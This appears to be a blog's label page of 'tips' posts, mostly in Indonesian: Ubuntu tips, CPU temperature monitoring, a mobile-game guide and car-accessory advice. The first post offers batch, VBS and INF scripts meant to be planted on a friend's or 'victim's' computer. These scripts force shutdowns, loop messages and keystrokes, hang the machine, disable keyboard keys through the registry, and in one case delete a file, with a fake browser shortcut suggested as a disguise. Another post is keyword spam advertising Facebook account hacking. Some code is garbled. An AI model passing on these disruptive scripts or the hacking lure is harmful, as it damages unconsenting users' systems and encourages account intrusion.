Showing posts with label tips. Show all posts
Showing posts with label tips. Show all posts
Friday, September 22, 2017
Trik Tips Hacker Super Jail dengan Notepad
Trik Tips Hacker Super Jail dengan Notepad

Trik Tips Hacker Super Jail dengan Notepad
kumpulan Cara Hacker Komputer, berikut ini merupakan cara hack komputer yang super jail. cara ini sangat cocok buat balas dendam dengan teman Anda, dibutuhkan Aplikasi Notepad untuk membuat Jebakan Atau Virus ringan hingga yang sangat mematikan. baiklah saya akan berbagi pengetahuan tentang Cara Hacker Komputer, berikut langkah-langkahnya :
TRIK 1 - Membuat Forced Shoutdown
-------------------------------------------------
@echo offmsg * I dont like you
shutdown -c "Error! You are too ******!" -s
-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN
TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-------------------------------------------------------do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)
TRIK 3 - Membuat Pesan Jail mucul terus
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
------------------------------------------------------
simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop-------------------------------------------------------
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,
TRIK 5 - Membuat script mucul terus menerus
-------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
------------------------------------------------------- do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus
TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
--------------------------------------------------------
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
---------------------------------------------------------- Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya
TRIK 7 - Cara Membuat Pesan Komputer Anda Jelek Banget di Notepad/ Wordpad
-----------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
----------------------------------------------------------- do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs
TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%system32 otepad.exe
GOTO top
------------------------------------------------------------ :top
START %SystemRoot%system32 otepad.exe
GOTO top
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus
TRIK 9 - Membuat Notepad dengan Pesan Jail
-------------------------------------------------------------
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.vbs
ganti kode yang berwarna merah sesuai dengan selera anda.
TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
-----------------------------------------------------------
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top -----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.BAT
TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
-------------------------------------------------------------
start
start
start
start
start
start
start
start
start
start
start
start
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )
TRIK 12 - Cara Mematikan Tombol Keyboard
-------------------------------------------------------------
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF
Langsung kita mulai saja :
[Version]
Signature=�$Windows NT$�
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,�SYSTEMCurrentControlSetControlKeyboard Layout�,�Scancode Map�,0�1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00
�������������
2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
3. Log Off komputernya agar trik ini berfungsi.
NB :
Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.
Untuk menormalkannya, silahkan salin script berikut :
�������������
[Version]
Signature=�$Windows NT$�
[DefaultInstall]
DelReg =normal
[normal]
HKLM,�SYSTEMCurrentControlSetControlKeyboard Layout�,�Scancode Map�
�������������
�> Simpan dengan nama �NORMAL.INF�
Klik kanan file ini, pilih >Install
Log Off komputernya.
sumber artikel hack : kidzoom
download file now
Thursday, September 21, 2017
Ubuntu Power User Tips
Ubuntu Power User Tips
I thought I would start off the month with a collection of �power user� tips I have collected over the years. Some of these are real gems, some of them are just �been there, done that�. But all of them are useful.
So, without further adieu, let�s get to the tippage!
Global keyboard shortcuts
We all know that keeping your fingers on the keyboard makes for much more efficient computing. But did you know you can create global keyboard shortcuts for GNOME? This is done with the help of the gconf-editor tool. Here�s how it�s done:
- Hit
F2 - Enter gconf-editor to start up the tool.
- Navigate to Apps > Metacity > keybinding_commands.
- Right-click in the pane that lists all of the entries.
- Scroll until you see a list of command_N Where N is a number from 1-10
- Double click on one of these entries (remember which number you double clicked on).
- In the Value section enter the command you want to use.
- Click OK.
- Navigate to Apps > Metacity > global_keybindings.
- In the Value field enter the key combination you want to use for that app (for example
f for firefox). - Click OK.
- Test out your short cut.
Did you know you can have GNOME remember everything you have open when you next log in? This way you can resume working in the same state you were when you left. To do this navigate to System > Preferences > Startup Applications. In this new window click on the Options tab and check the box for �Automatically remember running applications when logging out�.
Now the next time you log out and log in, your apps will be there for you.
Speed up boot time with profiling
Ubuntu 10.4 has reached the 10 second mark for boot time. But what if yours isn�t quite reaching that goal? You can speed this up using the profile option. To do this follow these steps:
- At your boot screen press �e� (for edit).
- Use your arrow key and move down to the entry beginning with �kernel�.
- Press �e� again.
- Add �profile� (no quotes) at the end of this line.
- Hit Enter.
- Click �b� (for boot).
Remove menu delay
If you are like me, you want menus to pop up instantly. By default there is a slight delay for menus. To change this follow these steps:
- Open up a terminal window.
- Enter nano ~/.gtkrc-2.0
- Add a single line gtk-menu-popup-delay = 0
- Save that file
- Log out and log in.
Speed it up with no effects
If you find your GNOME desktop to be a bit sluggish, you might gain some speed by disabling special effects. To do this navigate to System > Preferences > Appearance. In this new window click on the Visual Effects tab and select None. This will boost your dekstop performance.
via Ghacks
download file now
Wednesday, September 13, 2017
Ubuntu Oneiric 11 10 Released Detailed Review and Tips
Ubuntu Oneiric 11 10 Released Detailed Review and Tips
Canonical and Ubuntu have reached yet another milestone with the release of Oneiric Ocelot, Ubuntu 11.10. There have been many controversial changes like the removal of Synaptic and gconf-tools, auto-hide of window buttons unless you hover you mouse over them etc. On the other hand, there have been many welcome changes including visual, accessibility and functional improvements.

Take the Tour:
http://www.ubuntu.com/ubuntu/take-the-tour
So here is a list of important changes that Oneiric has came across.
System
Ubuntu Oneiric comes in Hybrid ISO images and it is the first Ubuntu release featuring Linux Kernel 3.x, Gnome 3.x and also Multiarch support.
Continue Reading �
Take the Tour:
http://www.ubuntu.com/ubuntu/take-the-tour
So here is a list of important changes that Oneiric has came across.
Ubuntu Oneiric comes in Hybrid ISO images and it is the first Ubuntu release featuring Linux Kernel 3.x, Gnome 3.x and also Multiarch support.
download file now
Wednesday, September 6, 2017
Tutorial Hacking Tips Trick Facebook 2014
Tutorial Hacking Tips Trick Facebook 2014
Kali ini akan berbagi tutorial dalam bentuk PDF mengenai 15 cara hacking facebook & 23 tips dan trick facebook 2014 oleh Anurag.
Cara Hack Facebook 2015, Hacking Facebook 2014 Facebook Hacking 2014 Hacking Username Facebook 2015 Hacking Account 2015 Facebook Hacking Password Facebook � Facebook Hacking Facebook Cracking Facebook Crack Facebook Hack Video Hacking Facebook User & Password, Hack facebook password free, Hack Facebook password for Free, how to hack Facebook.com, hack Facebook, how to hack a Facebook account, how to hack Facebook, How to hack Facebook account? With our site you can hack any Facebook account, that you need. Online email & password hacking is simple and will take few minute. Unlimited Facebook Hack, Penelusuran yang terkait dengan facebook hack, facebook hack password facebook hack softwarepirates facebook hack facebook hack tool download facebook hack facebook hack attack facebook hacker facebook freezer.
15 Cara Hacking Account Facebook
23 Tips & Trick Facebook
Jika tertarik untuk membaca silakan download di link PDF berikut ini:
Selamat membaca, semoga bermanfaat. Jangan lupa jika bermanfaat WAJIB untuk di SHARE
download file now
Tuesday, September 5, 2017
Ubuntu Tips and Tricks
Ubuntu Tips and Tricks
How to check free disk space on an Ubuntu 14.04 machine ?
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda6 207G 48G 148G 25% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
udev 1.9G 4.0K 1.9G 1% /dev
tmpfs 384M 1.2M 383M 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 1.9G 16M 1.9G 1% /run/shm
none 100M 56K 100M 1% /run/user
download file now
Tuesday, August 22, 2017
Trick Tips Bermain Evil Bane Rise of Raven ANDROID
Trick Tips Bermain Evil Bane Rise of Raven ANDROID
EvilBane: Rise of Ravens adalah permainan terbaru yang dihadirkan oleh Netmarble. Netmarble memang salah satu developer game yang sering menghadirkan game yang disukai oleh banyak pecinta game di android seperti Lets Get Rich,Disney Magical Dice dan Seven Knights. Game ini sukses mencapai lebih dari 1,000,000 user per hari.

EvilBane diawali dengan warisan misterius yang turun melalui generasi ke generasi. Legenda mengatakan bahwa umat manusia menemukan cara untuk menganugerahi kekuatan pada pusaka mereka dengan menggunakan Heavenstone. Menurut kisah tersebut, kekuatan Heavenstone semakin meningkat seiring banyaknya crystal kuat ini digunakan, sampai akhirnya kekuatan ini dapat menyerap ke dalam tubuh manusia. Para tetua yang menyadari bahaya akan hal ini pun berusaha menutupi segala kenyataan tentang kegunaan Heavenstone dari mata dunia. 20 tahun kemudian, setelah berakhirnya Guardian�s War, pahlawan hebat Sir Dominion kembali ke Matera bersama anak didiknya. Dengan bantuan dari pemain EvilBane dari seluruh dunia, kisah ini kembali dimulai�
Segudang fitur game play menarik yang tersedia dalam EvilBane meliputi:
Karakter Luke, Khara, dan Vango: Luke adalah karakter yang terus berkembang. Ia memiliki stat yang seimbang dan baik untuk digunakan pada gameplay yang stabil. Khara sangat mengutamakan keseimbangan. Meskipun memiliki defense yang lemah, dia berbahaya karena kelincahannya. Vango memiliki fisik yang luar biasa. Dia tidak cukup cepat, tapi ia bisa menghabisi musuhnya dengan kekuatan super.


TIPS AND TRICKS
Tips memilih karakter
- Char Vango dengan attack power yang sangat dahsyat adalah char yang terkuat di game ini, kelemahannya yaitu attack speednya kurang, dan defensenya juga lemah tapi jangan salah banyak yang udah master Char vango yang menutupi kelemahannya tersebut dengan Equip yang pas seperti ironwall Ring nambah defense 3-4k (equip legend jika di up mythic bisa 5-6k) dan attack speed yang bisa didapatkan di equip armor. Char ini sangat rentan mati di Raid Naga untuk menutupi kekurangannya tersebut perlu pake Equip dengan life steal / life leech Recomend aksesoris (Stonewall ring / Vampiric).
- Char Khara adalah pejuang wanita elf yang terlincah dan tergesit dari kedua char lainnya, critical ratenya juga tinggi jika pake set assassin (Katar crit rate +18.2%), jurus dan serangannya sangat mematikan dan sulit dihindari walaupun char ini termasuk char paling lemah di evilbane ini tapi karena kecepatan serangan dan critical ratenya menjadikan char ini sebagai Winning streak breaker dan salah satu char yang sangat diperhitungkan di arena battle lawanpun dibuat ngeri oleh jurus jurusnya yang cepat dan sulit dihindari, armornya juga beragam dari critical rate, attack speed maupun skill cooldown time menjadikan char ini Favorit Arena & PVP Recomend Aksesoris (Nightwalker(Crit rate + Attack) / ironwall ring).
- Char Luke adalah karakter dengan attack dan defense yang seimbang meskipun char ini lebih condong ke defens, sulit sekali mencari kelemahan char ini bila char ini dipadu padankan dengan set equip Life Leech + Critical rate. Char ini paling gampang dipakai untuk newbie dan char ini paling sulit untuk mati terutama saat boss raid dan di dungeon kelemahan char ini bila tidak memakai build set yang bagus kemungkinan char ini cuma jadi bulan bulanan Char Vango dan Khara. Set equip dari karakter ini pun beragam dari mulai life leech, resist damage, HP++, maupun + Defense, Recomend accesoris untuk char ini nightwalker (nambah Crit rate dan sedikit Atk), IronWall (Nambah Def) atau Vampiric (nambah Atk+ Lifeleech).
LEVEL
- Semua item dapat ditingkatkan mulai dari level 1 hingga level 30. Level yang lebih besar akan memberikan stat yang lebih bagus.
- Pada Weapons (senjata), skill stat meningkat setiap 10 level.
- Kamu dapat meningkatkan item melalui fungsi ini.
GRADE
- Item terdiri dari 6 grade. Stat tambahan akan diberikan sesuai dengan tingginya peringkat item mu.
- Setiap Weapons memiliki maksimum 4 skills.
- Kamu bisa mendapatkan grade yang lebih tinggi pada item yang sama dengan menggunakan Heavenstones in the function.
- Kamu juga bisa mendapatkan random item dengan grade lebih tinggi menggunakan dua item berbeda pada fungsi ini.
Tips Memilih Senjata
Terdapat 3 type element senjata di game ini yaitu Petir, Es dan Api. Dari ketiga Elemen itu yang paling kuat yaitu type Api namun senjata jenis ini mungkin tidak akan berguna kalau di pvp kemungkinan playernya menghindar karena skillnya berjeda jadi memberi waktu buat player lain buat ngehindar dari serangan api tapi kalau kena bisa bahaya.

Tips Dapetin Equip Rare tanpa crystal
Ikut raid aja di raid berpeluang dapetin equip baik senjata, armor, aksesoris rare keatas syarat lvl naga harus 20++, jika level naga semakin tinggi maka peluang dapetin equip heroic keatas semakin besar biar ketemu sama naga lvl 20++ agan harus rajin2 dungeon di level 11-15 (Hard Mode)
di raid ini terdapat 4 jenis naga
- Azure Dragon (naga biru) spesialis drop Accesoris kalo naga jenis ini tentunya aman jika ngebot auto skill auto battle
- Crimson Dragon (Naga Merah) Naga ini spesialis drop senjata naga jenis ini tentunya aman jika ngebot auto skill auto battle
- Golden Dragon (Naga Emas) Naga ini spesialis drop Gold naga jenis ini tentunya aman jika ngebot auto skill auto battle
- Sandworm Dragon (Naga Cacing) Naga ini spesialis drop Armor dan perlu diingat naga ini menyerang dengan damage yang lumayan besar sehingga tidak dianjurkan untuk auto skill auto battle tapi itu semua tergantung ke defense agan jika defensenya mumpuni seharusnya ga akan dapet masalah kalo ngebot di naga ini
Tips Dapetin Raven Gear
Raven Gear adalah armor legendaris dan terkuat di episode ini, Raven Gear memiliki 2 jenis yakni seri Angelic dan seri Demon. yang mana pada seri Angelic Stat lebih terfokus di defens sedangkan seri Demonic stat lebih terfokus ke Attack ada beberapa trik untuk mendapatkan equip ini yaitu:
- Ikut guild battle dan menang naikin sampai tingkat SS atau SSS supaya berpeluang dapetin Raven Gear di daily guild reward.
- Batas pengambilan di guild reward ini jam 23:00 WIB setelah itu reward akan reset balik ke tingkat awal, oh iya stamina guild battle ini akan bertambah setiap 120 menit batas maksimal stamina guild adalah 5, maka dari itu sering2 lah online untuk membantu guild kalian supaya berkesempatan dapet reward SS.
- Dengan combine ada kemungkinan dapat equip raven tapi kemungkinannya sangat kecil dan menbutuhkan banyak gold.
- cara yang paling lama dan pasti dapet raven gear adalah login terus setiap hari selama sebulan, dan di minggu pertama setiap bulannya bakal dapet equip raven secara random.
Sumber: KASKUSscrenshoot gameplay di bawah ini








ADD ID ANE :DROPDEAD27
download file now
Tuesday, August 8, 2017
Ubuntu Tips Manage CPU temperature
Ubuntu Tips Manage CPU temperature
Firstly, we have our facebook page now, you will find a link to like this page in the right column, please like this page and keep yourself updated about new post(s) on Linux on Desktop.
I live in Ahmedabad, a city in Western India. In summers the temperature outsides goes to as high as 40-45 degrees, and in dorm rooms we do not have air-conditioning. Since, the ambient temperature is high, laptops usually boil, I have lots of respect for people who have designed these machines, the laptops usually get so hot that someone can make omelettes on these machines, still, I fear this might lead to failure and I wish I had way of finding out temperature of CPU to prevent potential failure.
A sensor is a device that converts physical phenomenon into electrical signals, your computer hardware has different sensors on-board, allowing you to find runtime information about present CPU temperature, fan speed, operating frequency etc and your operating system can inquire about these data values from sensor and thus allow you to monitor if you are reaching critical limit.
I will in this post show you different ways of keeping tab of temperature values on your Ubuntu box:
Finding temperature at command line -
Shoot up Terminal Window ( Applications -> Accessories -> Terminal ) and issue the following command to find out temperature of your system :
acpi -t
or for more complete information
acpi -v
However, if it shows acpi command not found, you can install by issuing the following command:
sudo apt-get install acpi

(Note : Another possibility of showing CPU temperature is to look at file - /proc/acpi/thermal_zone/TZXX/temperature , TZXX check your system )
Additionally, there are other sensors on your system that you can find information about, lm-sensors or Linux Hardware Monitoring helps you find information about these.
To install lm-sensors issue the following command ( I have included applet as well to make it simpler for you to find information graphically ) in the terminal window:
sudo apt-get install lm-sensors sensors-applet
Now issue the following command to configure different sensors and load appropriate module ( it is in general safe to agree to question asked in the configuration )
sudo sensors-detectNow once this completes, you can inquire about values of different sensors on your system by issuing following command in terminal window:
sensorsAlternatively, you can find information by adding applet to panel in gnome, to do so right click on panel at top and chose "Add to Panel"

Once, you add hardware monitor applet, you should get real-time information about present temperature of different core of your processor -

Additionally, if you want information about Hard Disk temperature you can do so by installing hddtemp and issuing hddtemp at command line with parameter as the drive whose tempreature sensor you want to access.
sudo apt-get install hddtemp
sudo hddtemp /dev/sda
Assuming, you want to access hardware sensor of drive /dev/sda.

There is a very useful applet called "CPU Frequency Scaling Monitor" that allows you to see the frequency at which you are presently operating and helps you tweak ass well, you can add it easily again by right clicking on panel above and right clicking, selecting "Add to Panel" and choosing "CPU Frequency Scaling Monitor".


additionally, if CPU temperature constantly remains high, try cleaning fan at the bottom of your laptop, with time it usually gets clogged with dust and removing dust can reduce heat significantly.
Article Written by : Ambuj Varshney (blogambuj@gmail.com)
For Linux on Desktop Blog , http://linuxondesktop.blogspot.com
(C) 2011 , Ambuj Varshney
download file now
Labels:
cpu,
manage,
temperature,
tips,
ubuntu
Tuesday, August 1, 2017
Trick Usil Trick Tips Usil
Trick Usil Trick Tips Usil
http://www.tombolesc.com/2010/11/trick-usil-trick-tips-usil.html
download file now
Tuesday, March 17, 2015
Tips on How to Buy a Cheap Car Accessories

Many people argue that the car he has is like a second wife for him. When asked for his car crash is fixed, then any money and how it immediately also be used for the cost of car repairs. therefore, if your car is now less complete accessories car, then immediately take your car to the garage to store a car or a variation of the nearest car from your house but the full stock of accessories ranging from lights, car rims, front grille of BMW, car horn, etc.. Make your second wife is more sleek and more beautiful than before.
For those of you who just bought a used car, you surely will find shortcomings. Immediately complete the used car you just bought last with a quality car accessories, but the price is competitive. Bring your car to the garage the car or the store nearest car to the variations in the up-grade in such a way that changes its appearance and performance become more attractive and good-looking. There are several things you must consider also simultaneously carried out ie you some tips how to buy a cheap car accessories, among others:
For those of you who just bought a used car, you surely will find shortcomings. Immediately complete the used car you just bought last with a quality car accessories, but the price is competitive. Bring your car to the garage the car or the store nearest car to the variations in the up-grade in such a way that changes its appearance and performance become more attractive and good-looking. There are several things you must consider also simultaneously carried out ie you some tips how to buy a cheap car accessories, among others:
- Record by you how many items or kinds of car accessories that you need to buy. Make a classification or sequence based on the priority scale. If you need to buy all car accessories such items if you have sufficient budget.
- Choose a car accessories shop or a variation of a very complete car and famous because you can choose a variety of brand, type, price for a certain items. Ask for discount for each car accessories items are also discounted from the total price of all items you buy car accessories.
- Do not be fanatical about a certain brand of car accessories. Choose brands that are cheaper but the quality is pretty good.
Similarly tips from us, hopefully your old car or a new used car you buy will look more perfect with a quality car accessories.
Subscribe to:
Posts (Atom)